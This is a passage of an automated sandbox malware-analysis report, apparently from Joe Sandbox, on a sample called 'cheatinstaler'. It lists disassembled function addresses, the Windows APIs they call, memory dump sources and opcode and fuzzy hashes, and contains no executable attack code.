                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3118131910-0
                                                                                  • Opcode ID: 932ad18ef346e480087a3096a192501f062bfc4628e0a3d12bdedb18b4200694
                                                                                  • Instruction ID: 9f62e82f5359e88db51513e613ee533ad4d05d626480dcce524c0de1aaf9378a
                                                                                  • Opcode Fuzzy Hash: 932ad18ef346e480087a3096a192501f062bfc4628e0a3d12bdedb18b4200694
                                                                                  • Instruction Fuzzy Hash: D7218622A18B8181FA10AF26F4A527EB361FB84BD4F941230FB9E46A95DF3CD544C610
                                                                                  Function 00007FF7545532BC Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 1203560049-0
                                                                                  • Opcode ID: 85da30fe1743cc553a0db4a1375168b1f74b8b313009b96f55f923233ac5e066
                                                                                  • Instruction ID: 48147dbfb9ae58f3be981875195d10e20a68f900dd1560268d32ebc16bec7d61
                                                                                  • Opcode Fuzzy Hash: 85da30fe1743cc553a0db4a1375168b1f74b8b313009b96f55f923233ac5e066
                                                                                  • Instruction Fuzzy Hash: 3C217422A1868182EA10AF2AF49417DB3A1FB887A4F980231FB9D47BE5DF3CD540C610
                                                                                  Function 00007FF75457BF64 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                  • Instruction ID: 7adb8d4b2a9d8f9dab02593fcc3a4eb5bffe655513934199606cdebc8cc756ca
                                                                                  • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                                  • Instruction Fuzzy Hash: 4FE01A24A0430586FA547F3298E9379A352BF88B85F685438D80A02397CE3DE4098620
                                                                                  Function 00007FF75454F578 Relevance: 3.2, APIs: 2, Instructions: 193COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75454F895
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75454F89B
                                                                                    • Part of subcall function 00007FF754553EC8: FindClose.KERNELBASE(?,?,00000000,00007FF754560811), ref: 00007FF754553EFD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                  • String ID:
                                                                                  • API String ID: 3587649625-0
                                                                                  • Opcode ID: 8b88dc6aee5f75cd0ed49939a50d5e880870ec1b9edbe9d6c08afce2113f0c83
                                                                                  • Instruction ID: 52eccd2752f1448be3cee0fac6ab56f3339ea977018e2e762e97d6a6c325865b
                                                                                  • Opcode Fuzzy Hash: 8b88dc6aee5f75cd0ed49939a50d5e880870ec1b9edbe9d6c08afce2113f0c83
                                                                                  • Instruction Fuzzy Hash: 32919E73F1868194EB10EF2AD4942ADA361FB84798FE84135FA4C0BAA9DF78D545C320
                                                                                  Function 00007FF754543904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: 059fe93b6b6045c61731c70e0e29f52abe1320b84121e6dc329f1e36eead177c
                                                                                  • Instruction ID: 971f407049ca45a9cf09fd5dc4328ed282575d7983062723b68cc76097b3a23f
                                                                                  • Opcode Fuzzy Hash: 059fe93b6b6045c61731c70e0e29f52abe1320b84121e6dc329f1e36eead177c
                                                                                  • Instruction Fuzzy Hash: D141C762F1465285FB00EFB3D4A02AD6760AF44BD4FA81135EF1D2BADADE38D442C310
                                                                                  Function 00007FF754552778 Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF75455274D), ref: 00007FF7545528A9
                                                                                  • GetLastError.KERNEL32(?,00007FF75455274D), ref: 00007FF7545528B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastPointer
                                                                                  • String ID:
                                                                                  • API String ID: 2976181284-0
                                                                                  • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                  • Instruction ID: 8481f520b260555702482f80d10d9926c21c45b5c2a2d09b820103174c18ff15
                                                                                  • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                                  • Instruction Fuzzy Hash: 6431B422B19A5282EA686F6BD9D06B9A350EF04BD4FDC0131FE1D07790DE3CE5418B60
                                                                                  Function 00007FF7545422BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 1746051919-0
                                                                                  • Opcode ID: 3846a219fa003ef6eba4311ff2349970a98922bd5935619b32e66c41ec2b6e9c
                                                                                  • Instruction ID: 3943aefc4c66bf5bf5f5bb85e5cefab880cf8c035414d64f2345429b9cd675da
                                                                                  • Opcode Fuzzy Hash: 3846a219fa003ef6eba4311ff2349970a98922bd5935619b32e66c41ec2b6e9c
                                                                                  • Instruction Fuzzy Hash: FC319222A1874541EA14AF16E4A537EB360FB847D0FE84231EB9D0BB95DF3CE140C714
                                                                                  Function 00007FF754552AD0 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$BuffersFlushTime
                                                                                  • String ID:
                                                                                  • API String ID: 1392018926-0
                                                                                  • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                  • Instruction ID: 24958b425aff6157d5aa06331a85b91b7a1c98f62566a7e99eda91a1d0e6f1c4
                                                                                  • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                                  • Instruction Fuzzy Hash: 8921B522F0974251EA6AAF53D4A47F6A790AF017A4FD94031FE4C06295EE3CE446CB20
                                                                                  Function 00007FF754572C80 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                  • String ID:
                                                                                  • API String ID: 3548387204-0
                                                                                  • Opcode ID: e8e9d160ec1903a932a5a39018fe25c36d4ba16f106dc0af14eb3e24c8a7c370
                                                                                  • Instruction ID: c0dc60d9fb3379260865381c6fc32216505403b29e1a905f4511f977f278c43c
                                                                                  • Opcode Fuzzy Hash: e8e9d160ec1903a932a5a39018fe25c36d4ba16f106dc0af14eb3e24c8a7c370
                                                                                  • Instruction Fuzzy Hash: A911ED60E5C14311FA5ABFB354FA2B9C1922F913D0FDC0034FA1D8A2C3ED1CAA468672
                                                                                  Function 00007FF75455AAE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString
                                                                                  • String ID:
                                                                                  • API String ID: 2948472770-0
                                                                                  • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                  • Instruction ID: 972793faa7c0a0ba3e2ac765126b889c4050a08ce16335d443133a6ee5608451
                                                                                  • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                                  • Instruction Fuzzy Hash: FC115B72B186418AEA00AF1BA8A0169F7A1BF89FD1FD84435DA0D93720DF7CE5418394
                                                                                  Function 00007FF754552BB0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastPointer
                                                                                  • String ID:
                                                                                  • API String ID: 2976181284-0
                                                                                  • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                  • Instruction ID: 9eb8c14dee18e74074a00a338af80636aad5d651ea4b3ef525f2e98c6285f45c
                                                                                  • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                                  • Instruction Fuzzy Hash: 8E119022A1864191EB64AF26E8D42B9A370EB44BB4FE80331FA6D062D5CF3CD582C710
                                                                                  Function 00007FF75454255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item$RectText$ClientWindowswprintf
                                                                                  • String ID:
                                                                                  • API String ID: 402765569-0
                                                                                  • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                  • Instruction ID: b1046203b9aa323bf59e0376cca15d4214c69bb77944a400537871a84f3ac133
                                                                                  • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                  • Instruction Fuzzy Hash: 79015211E1925A41FE597F53A4F42B9D7925F85784FDC4034E94D0E699DE6CE8848320
                                                                                  Function 00007FF75455EB58 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF75455EBAD,?,?,?,?,00007FF754555752,?,?,?,00007FF7545556DE), ref: 00007FF75455EB5C
                                                                                  • GetProcessAffinityMask.KERNEL32 ref: 00007FF75455EB6F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$AffinityCurrentMask
                                                                                  • String ID:
                                                                                  • API String ID: 1231390398-0
                                                                                  • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                  • Instruction ID: a01e9651d4c0f8653d0ddf06ac25c8c302927909f48743b4a57c2128c30e5d07
                                                                                  • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                  • Instruction Fuzzy Hash: 72E09B61F1854686DF599F57C4A15F9B392FFC8B40FD88035E60B83614DE2CE5458B10
                                                                                  Function 00007FF7545721D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                  • String ID:
                                                                                  • API String ID: 1173176844-0
                                                                                  • Opcode ID: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                                                                  • Instruction ID: 244b6e57bc69fd71bd916477aa98ef4b6fa14af895bbbbecbc0e3a965258d280
                                                                                  • Opcode Fuzzy Hash: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                                                                  • Instruction Fuzzy Hash: 60E0EC40E0E10745F92C7FA318B61B880403F593F1EDC1B30EE3E086C2AE1CA7928130
                                                                                  Function 00007FF75457D90C Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                  • String ID:
                                                                                  • API String ID: 588628887-0
                                                                                  • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                  • Instruction ID: c8a7c1d48fca4a32fe8181c15f9e18a6e2785d3381d68f23250903c615bc72f9
                                                                                  • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                  • Instruction Fuzzy Hash: CAE0E651E0950346FF14BFB358E5179A2D1AF94795F8C4434C90D8A252EE2C95898730
                                                                                  Function 00007FF7545433E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3668304517-0
                                                                                  • Opcode ID: bdf8625448bd8dcd1def64a6508c1891a019ebdf0eaa44acf70db7eea19c6d5a
                                                                                  • Instruction ID: 5a433f8069a6158c8dfa3869edb495adaef008dbe0d0c4cf64f43cbcad5d2baa
                                                                                  • Opcode Fuzzy Hash: bdf8625448bd8dcd1def64a6508c1891a019ebdf0eaa44acf70db7eea19c6d5a
                                                                                  • Instruction Fuzzy Hash: BBD1B862F0968251EB68AF2795E02B8F7A1FB15B94F980035CB5D0B7B1CF38E560C720
